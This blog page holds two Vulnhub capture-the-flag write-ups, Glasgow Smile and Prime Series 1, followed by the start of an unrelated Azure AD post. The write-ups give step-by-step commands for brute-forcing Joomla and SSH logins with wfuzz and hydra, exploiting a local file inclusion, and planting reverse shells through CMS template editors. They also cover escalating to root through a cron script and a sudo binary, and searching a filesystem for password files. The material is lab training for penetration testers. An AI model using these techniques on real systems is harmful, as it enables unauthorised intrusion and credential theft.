Sunday, 9 May 2021

Vulnhub Writeup: Glasgow Smile

Vulnhub - Glasgow Smile

Vulnhub Writeup - Glasgow Smile 1.1

glasgow smile login

Description

Title: Glasgow Smile

Users: 5
Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)
Hint: Enumeration is the key.
If you are a newbie in Penetration Testing and afraid of OSCP preparation, do not worry. Glasgow Smile is supposed to be a kind of gym for OSCP machines.

The machine is designed to be as real-life as possible. Anyway, You will find also a bunch of ctf style challanges, it’s important to have some encryption knowledge.

You need to have enough information about Linux enumeration and encryption for privileges escalation.

ABOUT THE VM:
Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)

The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically

CONTACT:
You can contact me on Hack the box https://www.hackthebox.eu/profile/232477 or by email (mindsflee@hotmail.com) for hints!

Initial Scans

nmap -sn 192.168.110.0/24

Server is up on IP 192.168.110.156

sudo autorecon 192.168.110.156

Open Ports

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))

22/tcp open ssh - OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

Normal banner

$ nc 192.168.110.156 22
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

ssh user enumeration not working (all users in list valid)

check this out more later

80/tcp open http - Apache httpd 2.4.38 ((Debian))

Let’s start with a gobuster scan

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x bak,php,html,txt -u http://192.168.110.156/

/index.html (Status: 200)
/joomla (Status: 301)
/server-status (Status: 403)

home page

nothing in the page source for index.html, let’s check out Joomla!

Joomla Brute force

Usernames to try

  • admin
  • joomla
  • administrator
  • superuser

You can do this manually by clearing browser cookies, then hit the login page (/administrator/ by default). Gather the cookie. Try a login and grab the POST data. Then use the wfuzz command.

Get a wordlist from the website

cewl http://192.168.110.156/joomla > cewl-joomla.txt

Grab a cookie & CSRF token

curl -i -s -k -X $'GET' -H $'Host: 192.168.110.156' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'X-Requested-With: XMLHttpRequest' -H $'X-Ajax-Engine: Joomla!' -H $'Connection: close' -H $'Referer: http://192.168.110.156/joomla/administrator/index.php' $'http://192.168.110.156/joomla/administrator/index.php' --output - | grep -E "Set-Cookie|value"

grabbing a cookie and csrf

Run wfuzz - Check the output for the first non-hidden response as your csrf token will get burned once you login

wfuzz -w ./cewl-joomla.txt --hs="Username and password do not match or you do not have an account yet." -X POST -b "6821ee9ea803cd64e2920ca203163e81=fh651031upk1m2cagqe9mcqoma" -d "username=joomla&passwd=FUZZ&option=com_login&task=login&return=aW5kZXgucGhw&099afa929ff747b43ea8f8b58dd2fc0f=1" -u 'http://192.168.110.156/joomla/administrator/index.php'

adding -p '127.0.0.1:8080:HTTP' --follow with burpsuite seems to make the response more reliable. Possibly because of a delay in requests.

password get

And we’re in at /administrator

Logged in

Reverse Shell

Login at /administrator, then click Extensions > Templates > Templates

templates menu

Click one of the templates

click one of the templates

Click index

index

Paste your code

paste your shell

Save it

save

Make sure your template is default, click Extensions > Template

extentions menu

Tick your template, click default

set default

Get code exec

get shell

And here is the working reverse shell

working reverse

Privesc

First, I take a look for any interesting readable files in /home

find /home -ls 2>/dev/null
find /home -type f -ls 2>/dev/null

listable file names in /home

configuration.php has mysql username/password

joomla db password

I want to use the mysql command to check the content of the original database and see if there are any credentials to steal. In order to use this command we need a propper tty. This will mess up your console while typing, but keep going, it gets better!

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

^Z # Press CTRL+Z

stty size
stty raw -echo
fg

stty rows XX cols XX

Now the shell should look more normal. mysql should work.

mysql -u joomla -p

proper tty

batjoke database has taskforce table, which looks to have some base64 encoded passwords.

batjoke database

Convert the b64 passwords

for line in $(cat pswd.b64); do echo $line | base64 -d ; echo "" ; done

baneishere
aaronishere
carnageishere
busterishereff
???AllIHaveAreNegativeThoughts???
auntis the fuck here

Add them to a password list and brute force ssh, usernames are pulled from /etc/passwd.

hydra ssh://192.168.110.156 -L ./files/usernames.txt -P ./files/passwords.txt

hydra brute force

A single login is returned

[22][ssh] host: 192.168.110.156   login: rob   password: ???AllIHaveAreNegativeThoughts???

Now we get the user.txt and access to the Abnerineedyourhelp file

rob login

Which appears to be some cipher text and something that resembles base64

Abnerineedyourhelp file

This website does a pretty good job at decoding the text, but if you look at the alphabet it looks a little off.

planetcalc

It’s essentially just a ceaser cipher shifted by one. I use this website for playing with basic ciphers.

cryptii ceaser

And decoding the base64 gives abner’s password

base64 decode

ssh as abner

The abner user has access to the .dear_penguins.zip in /var/www/joomla2/administrator/manifests/

penguin zip

Which can be unzipped with his password

unzip

My dear penguins, we stand on a great threshold! It’s okay to be scared; many of you won’t be coming back. Thanks to Batman, the time has come to punish all of God’s children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

I spent AGES trying to decode this to something with normal looking characters. Turns out it’s the ACTUAL PASSWORD! I tried all of the other encoded texts prior to this as the actual password and guess I’d given up with that strategy by now. Make sure to try strings that look encoded directly as passwords!

Hydra now gets the penguin user with this added to the password file.

hydra penguin

penguin to root

Using the penguin user we can now enter the SomeoneWhoHidesBehindAMask/ folder. Inside is a SUID find binary, but it’s owned by penguin so likely of no use.

There is also a .trash_old file which it is executable and owned by the root group which is a bit strange.

Running pspy64 shows that this is being executed as root on a schedule. Based on this I added a simple reverse shell to the script, set up a listener and we get a root shell.

trash.old file

Root shell

rooted

Written with StackEdit.

Sunday, 2 May 2021

Vulnhub Writeup: Prime Series 1

Vulnhub - Prime Series 1 Writeup.md

Vulnhub Writeup - Prime Series 1

Prime1

Description

This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.

This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox’s machines are designed.

So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration. If any extra help needed

Visit our website http://hacknpentest.com and http://hnpsecurity.com.

Some extra improvement needed to my VM please contact me on my email- suraj at hnpsecurity dot com.

You can download the box from vulnhub here.

Initial Scans

nmap -sn 192.168.110.0/24

Server is up on IP 192.168.110.152

sudo autorecon 192.168.110.152

Open Ports

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux;
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))

Web

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,bak,php -u http://192.168.110.152/

gobuster results

/secrets.txt

Looks like you have got some secrets.

Ok I just want to do some help to you.

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

//see the location.txt and you will get your next move//

Based on the above, it wants us to fuzz on the available php files. Using the Arjun tool, it’s possible to find hidden HTTP parameters on a given php file.

Arjun for image.php doesn’t find anything, but index.php finds the file parameter

python3 arjun.py -u http://192.168.110.152/index.php

arjun

File parameter confirmed with wfuzz

wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.110.152/index.php?FUZZ=1 --hh=136

wfuzz file parameter

After tyring several names in the file parameter, I tried the location.txt hinted at from secret.txt http://192.168.110.152/index.php?file=location.txt which gives some more details.

next parameter given

After running the following wfuzz command I realised this is now a true Local File Inclusion (LFI) as secret.txt is a valid result.

wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.110.152/image.php?secrettier360=FUZZ{test}.txt --hh=BBB

wfuzz results show secret.txt

Grabbing the /etc/passwd file there is a hint included in saket’s user description.

saket's hint in passwd

So let’s get /home/saket/password.txt

victors password

/wordpress

Now we have some credentials we can try SSH & WordPress. The password doesn’t work for saket or victor on SSH, but we can login to WordPress with victor:follow_the_ippsec at /wordpress/wp-login.php.

Once logged in, there is a single file that is writeable in the theme editor - secret.php

Theme Editor

Paste in a simple php reverse shell

Reverse Shell

Set up a listener on your machine

nc -lvnp 1998

And activate it “http://192.168.110.152/wordpress/wp-content/themes/twentynineteen/secret.php?faltshell=yesplease

SHELL GET!

enc

In saket’s home directory we have the user.txt and an executable

home directory files

The executable is not readable so we can’t disassemble or run strings against it for clues.

www-data can run the executable as root, but we need a password

sudo as www

There is an interesting file in /opt

opt file

It responds with “good” and it looks like it dropped a couple of files in saket’s home.

files dropped

we can get the “real form” md5 hash of ippsec by running

www-data@ubuntu:/home/saket$ echo -n ippsec | md5sum
366a74cb3c959de17d61db30591c39d1  -

enc.txt seems to contain something that resembles Base64

www-data@ubuntu:/home/saket$ cat enc.txt 
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=

So we somehow have to decode the encrypted string, probably using 366a74cb3c959de17d61db30591c39d1 as the key.

I found this site which allows you to encrypt and decrypt AES. I tried a few different options, it looks like ECB with 256 bit key works.

AES Decrypted

And now it can be decoded with base64 command

Base64 Decoded

This password now works to log in to the box as saket using ssh.

saket -> root

Once logged in, sudo -l shows saket can run a non standard binary /home/victor/undefeated_victor as root.

saket sudo

It shows an error saying /tmp/challenge not found. Presumably it’s trying to call another script?

So let’s try:

echo "/bin/sh" > /tmp/challenge

permission denied

And now we get permission denied. Let’s try making it executable

chmod +x /tmp/challenge

And now the box is rooted

rooted

Final thoughts

I had some real difficulty finding the password for the enc binary. Always remember to check /opt as it’s used quite often by admins for additional software and files. If that’s useless try searching the filesystem by date / filename etc. for interesting files.

Here’s some helpful commands

find all files modified between the following dates

ls --full-time
find / -type f -newermt "2018-09-09 12:00:00" ! -newermt 2018-09-12 -ls 2>/dev/null

or with better time output

find / -type f -newermt "2015-11-13 06:00:00" ! -newermt "2015-11-13 08:50:00" -printf "%CY-%Cm-%Cd %CH:%CM %M %u\t%g \t%p\n" 2>/dev/null | sort

find files with password in the name

find / -name '*pass*' 2>/dev/null | sort | less

find files newer than lsb-release (or when OS was installed), named pass

ls --full-time /etc/lsb-release 
find / -type f -newermt "2019-08-01 00:00:01" -name "*pass*" -printf "%CY-%Cm-%Cd %CH:%CM %M %u\t%g \t%p\n" 2>/dev/null | sort

Find all files containing “string” excluding binaries

grep -InHrw '/' -e "string" 2>/dev/null

Probably better to include files with known extensions

grep --include=\*.{c,h,txt,sh} -InHrw '/' -e "string" 2>/dev/null

and/or exclude /bin /proc /run etc.

grep --exclude-dir={bin,sbin,dev,proc,run,sys} -InHrw '/' -e "string" 2>/dev/null

Written with StackEdit.

Azure AD Connect Sync fails with Event ID 6311

Azure AD Connect Sync fails to synchronise with Event ID 6311 Issue ADSync Event ID 6311 in the Application event log The server encounte...